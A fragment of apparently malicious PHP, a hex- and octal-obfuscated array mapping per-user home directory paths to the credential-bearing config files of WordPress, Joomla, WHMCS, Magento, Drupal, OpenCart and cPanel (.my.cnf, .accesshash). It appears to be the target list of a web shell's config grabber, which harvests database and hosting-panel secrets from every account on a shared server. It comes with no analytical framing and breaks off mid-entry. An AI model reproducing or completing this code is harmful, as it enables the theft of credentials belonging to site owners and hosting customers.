"\57\150\x6f\x6d\x65\x2f{$user_cox}\57\160\165\142\x6c\151\143\137\x68\x74\x6d\154\57\x4e\105\127\123\57\x77\x70\55\x63\157\x6e\146\x69\147\56\160\150\x70" => "\x57\157\162\x64\120\x72\145\163\163\116\x65\x77\x73", "\57\x68\157\155\x65\57{$user_cox}\57\160\165\142\x6c\151\x63\137\x68\164\x6d\154\x2f\x6e\145\167\163\57\x77\x70\x2d\x63\x6f\156\x66\151\x67\x2e\x70\x68\x70" => "\x57\x6f\162\x64\x50\x72\x65\x73\163\116\145\167\x73", "\57\150\157\155\x65\57{$user_cox}\x2f\160\x75\x62\154\151\x63\x5f\150\164\155\x6c\57\x43\x6d\163\x2f\x77\160\x2d\143\x6f\156\x66\151\x67\x2e\x70\150\160" => "\127\x6f\x72\x64\x50\x72\x65\x73\163\103\155\163", "\x2f\x68\x6f\155\x65\57{$user_cox}\x2f\x70\x75\x62\x6c\x69\143\x5f\x68\164\x6d\154\x2f\103\x4d\x53\x2f\167\x70\55\x63\x6f\x6e\146\151\x67\x2e\x70\150\160" => "\127\x6f\162\x64\120\162\145\163\x73\103\155\163", "\x2f\x68\157\155\145\x2f{$user_cox}\57\x70\x75\142\154\x69\x63\137\150\164\155\x6c\57\143\x6d\x73\57\x77\160\55\x63\157\156\x66\151\x67\56\x70\150\x70" => "\x57\157\x72\x64\120\162\145\x73\x73\x43\155\163", "\57\x68\157\x6d\145\x2f{$user_cox}\57\160\165\x62\154\151\143\x5f\150\164\x6d\154\x2f\x4d\141\151\156\x2f\167\x70\55\x63\157\x6e\146\151\x67\x2e\x70\x68\160" => "\127\157\x72\x64\120\x72\145\163\x73\x4d\141\151\156", "\x2f\150\x6f\x6d\145\x2f{$user_cox}\57\x70\165\142\x6c\x69\x63\x5f\x68\164\x6d\x6c\x2f\115\x41\x49\x4e\x2f\167\160\55\143\157\156\146\151\147\x2e\x70\150\x70" => "\x57\x6f\162\x64\x50\x72\x65\163\x73\x4d\x61\x69\x6e", "\x2f\x68\157\155\x65\57{$user_cox}\x2f\160\x75\142\x6c\151\x63\137\150\164\155\x6c\57\155\x61\151\156\x2f\167\x70\55\x63\157\x6e\146\x69\147\56\160\x68\160" => "\127\157\162\144\x50\x72\x65\163\163\x4d\141\x69\156", "\x2f\150\157\155\145\57{$user_cox}\57\160\x75\142\154\151\143\x5f\150\x74\155\x6c\x2f\102\154\157\147\x2f\167\x70\55\x63\x6f\156\146\151\147\x2e\x70\150\160" => "\x57\157\x72\x64\120\162\x65\x73\x73\x42\x6c\157\147", "\x2f\150\x6f\155\145\x2f{$user_cox}\57\x70\x75\142\154\151\x63\137\150\x74\155\x6c\x2f\102\x4c\117\x47\57\x77\x70\55\143\x6f\156\146\151\x67\x2e\x70\x68\160" => "\127\157\162\x64\x50\162\145\163\163\x42\x6c\x6f\x67", "\x2f\x68\157\155\x65\x2f{$user_cox}\57\160\x75\142\x6c\151\x63\x5f\150\x74\x6d\154\x2f\142\154\157\147\x2f\167\x70\x2d\143\x6f\x6e\146\151\x67\x2e\x70\x68\160" => "\127\x6f\162\144\120\x72\145\163\163\102\154\x6f\x67", "\57\150\x6f\x6d\145\x2f{$user_cox}\57\x70\x75\x62\x6c\151\143\x5f\x68\x74\x6d\x6c\x2f\x42\x6c\157\x67\x73\x2f\x77\160\55\x63\x6f\x6e\x66\151\147\x2e\x70\x68\x70" => "\127\157\162\144\x50\162\145\163\x73\102\x6c\x6f\147\x73", "\x2f\x68\157\x6d\145\57{$user_cox}\57\x70\165\x62\154\x69\x63\x5f\150\x74\155\154\57\x42\x4c\117\x47\x53\57\x77\x70\55\x63\157\156\146\x69\x67\56\x70\x68\x70" => "\x57\157\x72\144\x50\162\x65\x73\x73\102\x6c\157\x67\x73", "\x2f\150\x6f\x6d\145\x2f{$user_cox}\x2f\160\165\x62\154\x69\143\x5f\x68\x74\x6d\154\x2f\x62\x6c\x6f\147\163\57\167\160\x2d\143\x6f\156\146\x69\147\x2e\160\x68\x70" => "\x57\x6f\162\144\120\x72\145\163\163\102\154\157\147\163", "\x2f\150\x6f\x6d\x65\x2f{$user_cox}\57\x70\x75\x62\x6c\151\x63\137\x68\164\x6d\x6c\x2f\142\145\x74\x61\x2f\167\160\55\x63\157\156\146\x69\x67\x2e\x70\x68\x70" => "\x57\x6f\162\144\x50\x72\145\163\163\102\x65\x74\141", "\57\x68\157\x6d\x65\x2f{$user_cox}\x2f\x70\165\142\154\151\x63\137\x68\164\155\154\57\102\x65\x74\x61\57\167\x70\x2d\x63\x6f\156\x66\x69\x67\x2e\x70\x68\160" => "\127\x6f\x72\x64\120\162\x65\163\x73\102\145\164\x61", "\57\150\157\x6d\x65\57{$user_cox}\x2f\x70\x75\x62\154\151\143\137\x68\164\x6d\154\x2f\x42\x45\124\x41\57\167\160\55\143\x6f\156\x66\151\x67\56\160\150\160" => "\127\x6f\162\144\120\162\145\x73\x73\102\x65\164\x61", "\x2f\x68\x6f\x6d\145\x2f{$user_cox}\57\160\x75\142\154\x69\x63\137\x68\164\155\154\x2f\120\122\105\123\123\57\167\x70\55\143\157\x6e\146\151\x67\56\160\150\x70" => "\127\157\162\x64\120\x72\145\x73\x73\x50\162\145\163\x73", "\57\150\157\x6d\145\57{$user_cox}\x2f\x70\x75\x62\x6c\151\x63\137\150\164\155\154\57\120\162\145\x73\163\x2f\167\x70\x2d\143\157\156\146\151\x67\x2e\x70\x68\x70" => "\127\157\162\x64\x50\x72\x65\163\163\120\162\145\163\163", "\x2f\150\x6f\x6d\145\57{$user_cox}\x2f\160\165\142\x6c\151\x63\x5f\x68\164\155\154\57\x70\162\x65\163\163\57\167\160\x2d\x63\x6f\x6e\146\151\x67\x2e\x70\x68\160" => "\127\x6f\162\144\x50\x72\145\x73\163\120\x72\x65\163\163", "\57\150\x6f\x6d\145\x2f{$user_cox}\x2f\160\165\142\154\151\143\x5f\x68\x74\155\x6c\x2f\x57\160\57\x77\160\x2d\x63\x6f\156\x66\151\147\x2e\160\x68\160" => "\127\x6f\162\144\x50\x72\145\x73\163\x57\160", "\57\x68\x6f\155\x65\x2f{$user_cox}\57\160\165\142\x6c\x69\143\x5f\150\164\x6d\x6c\x2f\x77\160\x2f\167\x70\x2d\143\157\156\146\151\147\56\x70\150\160" => "\127\x6f\x72\144\120\162\145\163\163\127\x70", "\57\150\157\155\145\x2f{$user_cox}\x2f\160\x75\x62\x6c\151\143\137\x68\x74\x6d\x6c\57\127\x50\57\167\160\x2d\143\x6f\x6e\x66\x69\147\56\160\150\x70" => "\127\x6f\x72\x64\120\162\x65\163\x73\x57\120", "\57\x68\x6f\x6d\x65\x2f{$user_cox}\57\160\x75\x62\x6c\x69\x63\137\150\164\x6d\x6c\x2f\x70\157\x72\x74\141\154\x2f\167\160\x2d\x63\157\156\x66\151\x67\56\x70\150\160" => "\127\157\162\x64\120\x72\145\x73\x73\120\x6f\162\164\141\154", "\x2f\x68\157\x6d\x65\x2f{$user_cox}\57\160\x75\142\x6c\x69\x63\x5f\150\x74\x6d\x6c\57\120\x4f\122\124\101\114\x2f\167\x70\x2d\x63\x6f\156\146\151\x67\x2e\x70\150\160" => "\127\x6f\162\x64\120\162\145\x73\163\x50\157\x72\x74\x61\154", "\x2f\x68\157\x6d\x65\57{$user_cox}\x2f\160\165\142\x6c\x69\143\x5f\150\x74\x6d\154\57\x50\157\x72\x74\x61\154\57\167\160\55\x63\157\156\146\151\x67\56\x70\150\x70" => "\127\157\x72\x64\x50\162\145\163\x73\x50\x6f\162\164\141\x6c", "\57\x68\x6f\x6d\x65\x31\57{$user_cox}\x2f\x2e\x6d\x79\56\x63\156\x66" => "\143\x70\x61\x6e\145\x6c", "\57\x68\157\155\145\x31\x2f{$user_cox}\x2f\x2e\x61\143\x63\x65\x73\x73\x68\141\163\150" => "\x57\x48\x4d\55\x61\143\143\x65\x73\163\x68\x61\163\150", "\x2f\x68\157\155\145\x31\x2f{$user_cox}\x2f\x70\x75\142\x6c\x69\x63\137\150\164\x6d\154\57\x62\167\x2d\x63\157\x6e\x66\x69\147\163\57\143\157\156\146\x69\147\x2e\151\x6e\x69" => "\x42\x6f\x73\x57\145\142", "\57\150\157\x6d\x65\61\x2f{$user_cox}\57\x70\165\x62\x6c\x69\x63\x5f\150\164\x6d\x6c\57\143\157\156\x66\151\147\57\x6b\157\x6e\145\x6b\163\x69\x2e\x70\150\x70" => "\x4c\x6f\x6b\x6f\155\145\x64\x69\x61", "\x2f\x68\157\x6d\x65\x31\57{$user_cox}\57\160\165\142\154\151\143\x5f\x68\x74\x6d\154\x2f\x6c\157\x6b\157\x6d\145\x64\151\141\x2f\x63\x6f\156\x66\151\147\x2f\153\157\156\x65\x6b\x73\151\x2e\160\150\x70" => "\x4c\x6f\x6b\x6f\155\145\144\151\x61", "\57\150\x6f\x6d\x65\x31\x2f{$user_cox}\57\160\165\142\x6c\151\x63\137\x68\164\x6d\154\x2f\x63\x6c\151\x65\156\164\x61\x72\x65\141\57\x63\x6f\x6e\146\151\x67\x75\162\x61\x74\x69\157\x6e\x2e\160\150\160" => "\x57\x48\x4d\103\x53", "\x2f\150\157\155\145\61\57{$user_cox}\57\160\165\142\x6c\151\x63\x5f\150\x74\155\x6c\57\167\x68\x6d\x63\163\57\143\x6f\x6e\x66\151\147\165\x72\141\x74\x69\x6f\156\x2e\x70\150\x70" => "\127\x48\115\x43\123", "\x2f\x68\x6f\x6d\145\x31\x2f{$user_cox}\x2f\160\165\142\x6c\151\143\x5f\150\x74\x6d\x6c\57\146\x6f\x72\165\x6d\57\143\157\x6e\146\x69\x67\x2e\160\150\160" => "\x70\150\160\102\102", "\x2f\x68\x6f\x6d\145\61\x2f{$user_cox}\57\x70\165\x62\x6c\x69\x63\137\150\x74\x6d\x6c\57\163\151\x74\145\163\57\x64\x65\146\141\x75\154\x74\x2f\163\145\x74\x74\x69\x6e\147\163\x2e\x70\150\160" => "\x44\162\x75\x70\141\x6c", "\x2f\150\157\x6d\145\61\x2f{$user_cox}\x2f\x70\165\x62\154\x69\x63\137\x68\x74\x6d\154\57\x63\x6f\x6e\x66\x69\x67\57\163\145\x74\x74\151\x6e\x67\163\56\151\x6e\x63\x2e\160\150\x70" => "\x50\162\x65\163\x74\141\x53\x68\157\160", "\57\x68\157\155\145\x31\57{$user_cox}\57\x70\x75\x62\x6c\151\143\137\150\x74\x6d\x6c\57\141\160\x70\x2f\x65\164\143\57\154\157\x63\141\154\x2e\170\x6d\154" => "\x4d\x61\x67\145\156\x74\157", "\57\x68\x6f\x6d\145\x31\57{$user_cox}\x2f\x70\x75\142\154\151\x63\137\150\164\x6d\x6c\57\x61\x64\155\151\156\57\143\157\156\x66\151\x67\56\x70\x68\160" => "\117\x70\x65\x6e\x43\141\162\x74", "\57\x68\x6f\x6d\x65\61\x2f{$user_cox}\x2f\x70\x75\142\x6c\x69\143\x5f\150\x74\x6d\154\57\x73\154\x63\157\x6e\146\x69\x67\56\160\x68\160" => "\x53\151\x74\145\x6c\x6f\153", "\x2f\150\x6f\x6d\145\61\57{$user_cox}\x2f\160\x75\x62\154\151\x63\137\150\164\x6d\x6c\x2f\x61\160\160\154\151\x63\x61\164\x69\157\156\57\x63\157\x6e\x66\151\x67\x2f\x64\x61\164\141\x62\141\163\x65\x2e\160\x68\x70" => "\105\x6c\154\151\163\154\141\142", "\x2f\x68\x6f\155\x65\x31\57{$user_cox}\x2f\160\x75\142\x6c\151\x63\137\150\x74\155\154\57\167\150\x6d\57\x63\157\x6e\x66\151\x67\165\x72\x61\164\x69\157\156\x2e\x70\150\160" => "\x57\x48\x4d\103\123", "\x2f\x68\x6f\x6d\x65\x31\x2f{$user_cox}\x2f\160\x75\142\x6c\151\x63\x5f\x68\x74\x6d\x6c\57\x77\x68\x6d\143\x2f\x57\x48\x4d\57\x63\x6f\x6e\x66\x69\147\165\162\141\x74\151\x6f\x6e\x2e\x70\150" => "\127\110\115\x43", "\57\x68\157\155\145\x31\57{$user_cox}\x2f\x70\x75\142\x6c\x69\x63\x5f\150\164\155\154\x2f\143\x65\x6e\164\x72\141\154\57\x63\157\x6e\146\x69\x67\165\162\x61\x74\x69\157\x6e\x2e\160\150\x70" => "\127\110\115\x20\x43\x65\156\164\162\141\154", "\x2f\x68\157\x6d\145\x31\x2f{$user_cox}\x2f\160\x75\x62\x6c\x69\x63\137\150\164\x6d\154\57\167\x68\x6d\57\127\x48\115\x43\x53\x2f\x63\x6f\156\146\151\x67\x75\x72\x61\x74\151\x6f\156\x2e\x70\x68\x70" => "\x57\110\x4d\103\x53", "\x2f\x68\157\155\145\61\57{$user_cox}\57\x70\x75\142\x6c\151\x63\x5f\150\x74\x6d\154\57\167\150\x6d\57\x77\150\x6d\x63\x73\x2f\x63\157\x6e\x66\x69\x67\165\162\141\164\x69\157\156\56\160\x68\160" => "\x57\x48\x4d\103\123", "\x2f\150\x6f\x6d\145\x31\57{$user_cox}\57\160\165\142\154\151\143\x5f\150\x74\x6d\x6c\x2f\x73\x75\142\155\151\x74\164\x69\x63\x6b\145\x74\x2e\x70\x68\160" => "\127\x48\115\103\123", "\57\150\x6f\x6d\x65\61\x2f{$user_cox}\x2f\x70\165\x62\154\151\143\137\150\x74\155\154\57\x63\157\x6e\146\151\147\165\162\x61\x74\151\x6f\156\56\160\x68\160" => "\x4a\x6f\157\155\154\141", "\x2f\150\157\155\x65\x31\57{$user_cox}\57\160\165\x62\154\x69\143\137\x68\x74\x6d\x6c\x2f\x4a\157\x6f\x6d\x6c\141\x2f\143\x6f\x6e\146\151\x67\x75\162\141\164\151\x6f\156\56\x70\150\x70" => "\112\157\157\x6d\154\x61\x4a\157\x6f\155\x6c\x61", "\57\150\x6f\155\145\x31\x2f{$user_cox}\x2f\x70\165\142\154\x69\x63\x5f\150\164\155\154\x2f\152\157\x6f\x6d\x6c\x61\x2f\x63\157\156\x66\x69\x67\165\x72\141\x74\x69\157\x6e\56\x70\x68\x70" => "\112\x6f\x6f\x6d\x6c\x61\112\157\157\x6d\154\141", "\57\x68\157\155\x65\61\57{$user_cox}\x2f\x70\x75\x62\x6c\x69\143\x5f\150\164\155\x6c\57\112\117\117\x4d\x4c\x41\x2f\143\x6f\156\x66\151\x67\165\x72\x61\x74\151\157\156\56\160\x68\x70" => "\112\157\157\x6d\x6c\x61\112\x6f\157\155\x6c\x61", "\x2f\x68\157\x6d\145\61\57{$user_cox}\x2f\x70\x75\x62\x6c\151\x63\137\150\164\155\154\57\110\157\x6d\x65\57\143\157\156\x66\x69\147\x75\x72\x61\x74\x69\157\156\x2e\x70\150\160" => "\112\157\x6f\x6d\154\141\110\157\x6d\145", "\57\150\157\155\145\61\x2f{$user_cox}\x2f\160\165\142\154\x69\x63\137\x68\x74\155\154\57\x48\x4f\115\x45\x2f\x63\x6f\156\x66\151\147\165\162\141\164\x69\157\156\x2e\x70\x68\160" => "\112\x6f\x6f\x6d\x6c\x61\110\x6f\155\x65", "\57\150\x6f\x6d\145\61\57{$user_cox}\57\160\165\142\x6c\151\x63\x5f\x68\164\x6d\154\x2f\150\x6f\155\145\x2f\143\x6f\156\x66\x69\147\165\162\141\164\x69\x6f\156\x2e\x70\x68\160" => "\x4a\x6f\x6f\155\154\x61\x48\157\155\145", "\57\150\x6f\x6d\x65\61\57{$user_cox}\x2f\x70\165\142\x6c\151\x63\x5f\x68\164\x6d\x6c\x2f\x4e\x45\x57\x2f\143\x6f\156\x66\151\x67\165\162\141\164\151\157\156\x2e\x70\x68\160" => "\x4a\x6f\x6f\x6d\154\141\x4e\145\167", "\x2f\150\x6f\x6d\145\x31\x2f{$user_cox}\57\160\165\142\154\x69\143\137\x68\164\155\154\x2f\x4e\145\x77\x2f\x63\x6f\156\146\x69\147\x75\162\141\164\151\x6f\x6e\x2e\x70\150\x70" => "\x4a\157\157\155\154\x61\x4e\x65\167", "\57\150\157\x6d\145\x31\x2f{$user_cox}\x2f\160\165\x62\154\x69\143\x5f\x68\x74\x6d\x6c\57\x6e\145\x77\x2f\143\x6f\156\146\151\147\x75\x72\x61\164\151\x6f\x6e\x2e\x70\150\160" => "\112\x6f\157\x6d\x6c\x61\x4e\x65\x77", "\x2f\150\157\155\145\x31\57{$user_cox}\x2f\160\x75\x62\154\x69\x63\137\150\164\155\154\57\116\145\167\x73\x2f\143\x6f\156\x66\x69\147\x75\x72\x61\x74\151\x6f\156\56\x70\150\160" => "\112\x6f\x6f\155\x6c\141\x4e\145\x77\163", "\x2f\x68\x6f\x6d\x65\x31\x2f{$user_cox}\x2f\x70\x75\x62\154\x69\143\x5f\150\164\x6d\154\x2f\116\105\x57\x53\x2f\143\157\x6e\x66\151\x67\x75\162\x61\x74\x69\x6f\x6e\x2e\160\150\160" => "\x4a\x6f\x6f\x6d\x6c\141\116\145\x77\163", "\57\x68\157\155\x65\x31\57{$user_cox}\x2f\160\x75\142\x6c\151\143\x5f\x68\164\155\x6c\57\x6e\145\167\163\x2f\x63\x6f\x6e\x66\151\x67\165\x72\141\164\151\157\x6e\x2e\x70\150\160" => "\112\157\157\x6d\x6c\x61\x4e\x65\x77\163", "\57\150\x6f\155\x65\x31\57{$user_cox}\x2f\x70\x75\x62\154\x69\143\137\150\164\155\x6c\57\x43\155\x73\57\x63\x6f\x6e\146\x69\147\165\162\141\164\x69\x6f\x6e\56\x70\150\160" => "\112\x6f\157\x6d\x6c\x61\103\155\x73", "\x2f\150\157\x6d\145\61\57{$user_cox}\x2f\160\165\142\154\151\x63\137\150\x74\x6d\x6c\x2f\x43\x4d\123\x2f\143\x6f\x6e\146\151\147\165\162\x61\164\151\x6f\x6e\x2e\x70\150\160" => "\112\x6f\157\155\154\141\103\155\x73", "\x2f\x68\157\155\145\x31\x2f{$user_cox}\x2f\160\165\x62\x6c\x69\x63\x5f\x68\164\155\x6c\x2f\143\x6d\x73\x2f\143\x6f\x6e\x66\151\147\x75\162\141\x74\151\157\x6e\x2e\160\150\160" => "\112\x6f\x6f\155\x6c\x61\103\155\x73", "\57\x68\157\x6d\x65\x31\57{$user_cox}\x2f\160\165\x62\154\x69\143\137\x68\164\155\154\57\x4d\141\x69\x6e\57\143\157\156\146\151\x67\165\162\141\164\151\x6f\x6e\x2e\160\150\160" => "\x4a\157\157\155\154\x61\x4d\x61\151\156", "\57\150\157\x6d\x65\61\x2f{$user_cox}\x2f\160\165\x62\x6c\151\143\137\x68\x74\155\154\x2f\x4d\x41\111\x4e\57\143\157\x6e\x66\151\147\165\162\141\x74\151\157\156\x2e\x70\x68\160" => "\x4a\x6f\x6f\155\x6c\x61\x4d\x61\151\x6e", "\57\x68\157\155\x65\x31\x2f{$user_cox}\x2f\x70\165\x62\x6c\151\x63\137\x68\164\155\154\x2f\155\x61\151\x6e\57\x63\157\156\146\151\147\165\x72\141\x74\151\x6f\156\x2e\x70\x68\160" => "\x4a\157\x6f\155\154\x61\x4d\141\151\x6e", "\57\150\x6f\x6d\145\61\57{$user_cox}\57\160\165\x62\154\x69\143\x5f\x68\x74\x6d\154\x2f\102\x6c\157\147\57\143\157\x6e\146\x69\x67\165\162\141\164\x69\x6f\156\x2e\160\150\160" => "\112\x6f\157\155\x6c\141\x42\154\x6f\x67", "\x2f\x68\157\155\x65\61\x2f{$user_cox}\57\160\165\x62\x6c\x69\143\137\x68\164\155\154\x2f\x42\x4c\x4f\x47\57\x63\x6f\156\146\151\147\165\x72\x61\164\151\x6f\156\56\160\150\160" => "\112\x6f\x6f\155\x6c\x61\102\154\x6f\147", "\x2f\x68\x6f\x6d\145\x31\57{$user_cox}\x2f\160\165\x62\x6c\151\143\137\150\164\155\154\57\x62\154\x6f\x67\57\143\157\x6e\x66\x69\x67\165\x72\141\x74\151\157\156\56\160\150\x70" => "\x4a\157\x6f\155\154\x61\x42\x6c\x6f\147", "\57\x68\157\155\145\x31\57{$user_cox}\57\160\165\x62\x6c\151\143\x5f\150\164\155\x6c\x2f\102\x6c\157\x67\163\x2f\x63\157\x6e\146\151\x67\165\162\x61\164\151\157\x6e\56\x70\x68\160" => "\112\x6f\157\155\154\x61\x42\x6c\x6f\x67\163", "\57\150\x6f\x6d\145\61\x2f{$user_cox}\57\160\x75\142\154\x69\143\137\x68\x74\155\154\x2f\102\x4c\x4f\107\123\57\143\x6f\x6e\x66\151\147\165\x72\141\x74\x69\x6f\x6e\x2e\160\150\160" => "\112\x6f\x6f\155\154\141\x42\154\x6f\x67\163", "\x2f\x68\157\155\x65\61\x2f{$user_cox}\x2f\160\x75\142\x6c\151\x63\x5f\x68\164\x6d\x6c\x2f\142\x6c\157\147\163\x2f\x63\157\156\x66\x69\x67\165\x72\x61\x74\151\x6f\x6e\56\x70\150\160" => "\112\x6f\157\x6d\154\141\102\154\157\147\x73", "\x2f\150\x6f\x6d\x65\61\57{$user_cox}\57\160\165\142\154\151\143\x5f\150\x74\155\x6c\x2f\x62\145\x74\141\x2f\143\157\x6e\x66\151\x67\x75\162\x61\x74\151\x6f\x6e\x2e\x70\x68\x70" => "\x4a\x6f\x6f\155\154\141\x42\x65\x74\x61", "\57\150\x6f\155\x65\61\x2f{$user_cox}\x2f\160\165\x62\154\151\x63\137\150\x74\155\154\57\x42\x65\164\x61\57\143\x6f\x6e\x66\151\x67\165\x72\141\164\151\157\x6e\x2e\160\x68\x70" => "\112\x6f\x6f\155\x6c\141\102\145\164\141", "\x2f\x68\157\155\145\61\57{$user_cox}\57\x70\x75\x62\x6c\x69\x63\137\x68\x74\155\x6c\57\x42\x45\x54\x41\x2f\143\157\156\x66\x69\x67\x75\x72\x61\x74\x69\x6f\x6e\x2e\160\150\x70" => "\x4a\x6f\x6f\155\x6c\x61\x42\145\x74\x61", "\57\150\x6f\155\145\61\57{$user_cox}\x2f\x70\165\x62\154\x69\x63\137\x68\x74\155\154\x2f\x50\122\x45\123\x53\57\x63\x6f\x6e\146\151\x67\x75\162\141\164\x69\x6f\x6e\x2e\x70\x68\160" => "\112\157\157\155\154\x61\x50\162\145\163\x73", "\57\150\x6f\x6d\x65\x31\x2f{$user_cox}\x2f\x70\x75\x62\x6c\x69\x63\137\150\x74\x6d\x6c\57\x50\x72\x65\x73\163\57\143\x6f\156\x66\x69\147\165\162\141\x74\151\x6f\x6e\x2e\160\150\160" => "\x4a\157\x6f\155\x6c\x61\120\162\145\163\163", "\x2f\150\157\155\145\61\x2f{$user_cox}\x2f\160\x75\x62\154\151\143\137\x68\x74\x6d\x6c\x2f\160\x72\x65\163\x73\x2f\143\x6f\156\146\x69\x67\x75\x72\x61\x74\151\x6f\x6e\56\x70\x68\160" => "\112\157\x6f\x6d\x6c\x61\x50\162\x65\163\x73", "\x2f\x68\157\x6d\145\x31\x2f{$user_cox}\57\x70\x75\x62\154\x69\143\x5f\150\x74\x6d\x6c\x2f\x57\x70\x2f\143\157\156\x66\151\x67\165\162\141\x74\151\x6f\x6e\x2e\x70\x68\160" => "\x4a\157\x6f\x6d\x6c\x61\x57\160", "\x2f\150\x6f\155\145\x31\x2f{$user_cox}\x2f\x70\x75\142\x6c\151\143\137\x68\x74\x6d\154\57\x77\x70\57\x63\x6f\156\146\x69\x67\x75\162\141\164\151\x6f\x6e\x2e\160\x68\160" => "\x4a\157\x6f\x6d\154\141\127\160", "\57\x68\157\155\x65\61\x2f{$user_cox}\x2f\x70\165\142\154\151\143\x5f\150\x74\x6d\x6c\57\x57\120\x2f\x63\157\x6e\146\151\147\x75\162\x61\164\151\157\x6e\56\160\x68\160" => "\112\x6f\x6f\155\x6c\141\127\120", "\x2f\150\157\155\145\61\57{$user_cox}\x2f\160\165\x62\x6c\x69\143\137\x68\x74\155\154\57\x70\x6f\162\164\x61\x6c\57\143\x6f\156\146\151\147\165\162\x61\164\151\157\156\56\160\x68\x70" => "\x4a\157\157\x6d\154\141\120\157\x72\164\141\154", "\57\150\x6f\x6d\145\61\x2f{$user_cox}\57\x70\165\142\x6c\x69\x63\x5f\150\164\155\x6c\x2f\120\x4f\x52\124\x41\114\x2f\x63\x6f\156\x66\x69\x67\165\162\x61\x74\151\157\x6e\56\x70\x68\160" => "\112\x6f\x6f\x6d\x6c\x61\120\157\x72\164\x61\x6c", "\x2f\x68\157\155\x65\x31\57{$user_cox}\x2f\160\165\142\x6c\x69\x63\x5f\x68\164\155\154\x2f\120\157\162\164\141\x6c\x2f\x63\x6f\x6e\x66\x69\x67\165\162\141\164\x69\157\x6e\56\160\x68\160" => "\x4a\x6f\x6f\155\x6c\x61\120\x6f\162\164\141\x6c", "\x2f\150\x6f\x6d\145\61\57{$user_cox}\57\160\165\142\x6c\151\143\137\150\x74\155\154\57\x77\160\55\x63\x6f\156\146\x69\x67\x2e\160\x68\x70" => "\127\157\x72\144\x50\162\x65\x73\x73", "\57\150\x6f\155\145\61\57{$user_cox}\x2f\160\x75\x62\x6c\151\143\137\x68\x74\x6d\154\x2f\167\x6f\162\144\160\x72\x65\163\x73\x2f\x77\x70\55\143\x6f\156\x66\151\x67\x2e\x70\150\x70" => "\127\157\x72\144\x50\162\145\163\163\127\x6f\x72\144\160\x72\x65\163\163", "\x2f\x68\157\x6d\145\61\x2f{$user_cox}\x2f\x70\x75\x62\x6c\x69\x63\137\150\164\x6d\x6c\57\x57\x6f\x72\x64\160\x72\x65\x73\x73\57\x77\x70\x2d\x63\157\x6e\146\x69\x67\56\160\150\160" => "\127\x6f\x72\144\120\162\x65\x73\163\x57\157\x72\144\160\x72\x65\163\x73", "\57\150\157\x6d\x65\x31\57{$user_cox}\57\160\165\x62\154\x69\x63\x5f\150\164\155\x6c\x2f\127\117\x52\104\x50\122\x45\x53\123\57\x77\x70\x2d\143\157\x6e\x66\x69\x67\x2e\x70\x68\160" => "\127\157\162\x64\120\162\145\163\163\127\157\x72\144\x70\x72\145\x73\163", "\x2f\x68\x6f\155\145\61\x2f{$user_cox}\x2f\160\x75\x62\x6c\x69\x63\x5f\150\164\155\154\x2f\x48\x6f\x6d\x65\x2f\x77\160\55\x63\x6f\156\x66\x69\147\56\160\x68\160" => "\127\x6f\x72\x64\x50\162\x65\163\163\x48\x6f\155\x65", "\57\x68\x6f\155\x65\x31\x2f{$user_cox}\x2f\160\x75\142\154\151\x63\137\x68\164\x6d\x6c\57\x48\x4f\x4d\105\57\x77\x70\55\143\x6f\x6e\x66\x69\x67\56\160\150\x70" => "\127\157\x72\144\x50\162\x65\163\x73\x48\157\155\145", "\57\150\x6f\x6d\x65\61\x2f{$user_cox}\57\x70\x75\142\154\x69\143\x5f\x68\164\155\x6c\x2f\150\157\155\145\x2f\x77\x70\55\x63\x6f\x6e\146\x69\x67\x2e\160\150\x70" => "\x57\x6f\x72\x64\x50\162\x65\163\x73\110\157\155\x65", "\57\150\157\155\145\61\x2f{$user_cox}\x2f\x70\x75\142\x6c\151\x63\137\150\x74\155\x6c\57\116\105\127\x2f\x77\160\x2d\x63\x6f\x6e\146\151\x67\x2e\x70\x68\160" => "\x57\x6f\162\x64\x50\x72\145\163\163\x4e\x65\x77", "\57\150\x6f\155\x65\61\57{$user_cox}\x2f\160\x75\x62\154\x69\x63\x5f\x68\x74\x6d\154\57\116\x65\x77\57\x77\160\x2d\x63\x6f\x6e\x66\151\147\56\x70\x68\x70" => "\x57\157\x72\144\120\162\145\163\163\x4e\145\167", "\57\150\x6f\x6d\145\61\57{$user_cox}\57\x70\165\142\x6c\x69\143\x5f\150\x74\155\154\57\156\x65\167\57\167\160\x2d\x63\157\156\x66\x69\147\56\x70\x68\160" => "\x57\x6f\162\144\x50\x72\x65\x73\x73\x4e\x65\167", "\57\150\157\x6d\x65\61\57{$user_cox}\x2f\160\165\142\154\151\x63\x5f\x68\164\x6d\154\x2f\116\145\x77\x73\57\x77\x70\55\x63\x6f\x6e\x66\151\x67\56\x70\x68\x70" => "\127\157\162\144\x50\x72\x65\x73\163\x4e\x65\167\x73", "\57\x68\157\155\145\61\x2f{$user_cox}\57\160\x75\142\x6c\x69\x63\x5f\150\x74\155\154\x2f\116\x45\127\x53\x2f\x77\x70\x2d\143\x6f\156\x66\x69\147\x2e\x70\150\160" => "\127\x6f\x72\144\x50\162\145\163\163\x4e\145\x77\x73", "\57\150\157\x6d\145\61\57{$user_cox}\x2f\x70\165\142\154\x69\x63\137\150\x74\155\154\x2f\156\x65\167\x73\x2f\167\160\x2d\x63\157\156\x66\151\147\x2e\x70\x68\160" => "\127\157\x72\144\x50\x72\x65\163\163\x4e\145\x77\x73", "\x2f\x68\157\x6d\145\x31\x2f{$user_cox}\57\x70\165\142\154\x69\143\x5f\x68\164\x6d\154\x2f\x43\155\163\57\167\160\x2d\143\157\156\146\151\x67\56\x70\150\160" => "\x57\157\x72\x64\x50\x72\145\163\x73\103\x6d\x73", "\57\150\x6f\155\145\x31\x2f{$user_cox}\57\x70\x75\142\x6c\151\143\x5f\x68\164\x6d\154\57\103\115\x53\57\167\x70\x2d\x63\157\156\146\151\x67\56\160\150\160" => "\x57\157\162\144\120\162\145\x73\163\x43\155\x73", "\57\150\157\155\145\x31\57{$user_cox}\x2f\x70\165\142\x6c\x69\x63\x5f\x68\x74\155\x6c\57\x63\155\163\x2f\x77\160\55\143\x6f\156\x66\x69\147\x2e\x70\x68\160" => "\127\157\x72\x64\x50\162\145\163\x73\103\x6d\163", "\57\150\157\155\x65\61\x2f{$user_cox}\57\x70\165\142\x6c\x69\x63\137\150\164\155\x6c\57\115\x61\x69\156\57\167\x70\55\143\157\x6e\146\151\147\x2e\x70\150\x70" => "\x57\x6f\x72\x64\120\162\x65\x73\x73\115\x61\x69\x6e", "\57\150\157\x6d\145\x31\x2f{$user_cox}\57\x70\x75\x62\154\151\x63\x5f\x68\x74\155\x6c\x2f\115\x41\x49\116\57\167\x70\x2d\143\157\156\x66\151\x67\x2e\160\150\160" => 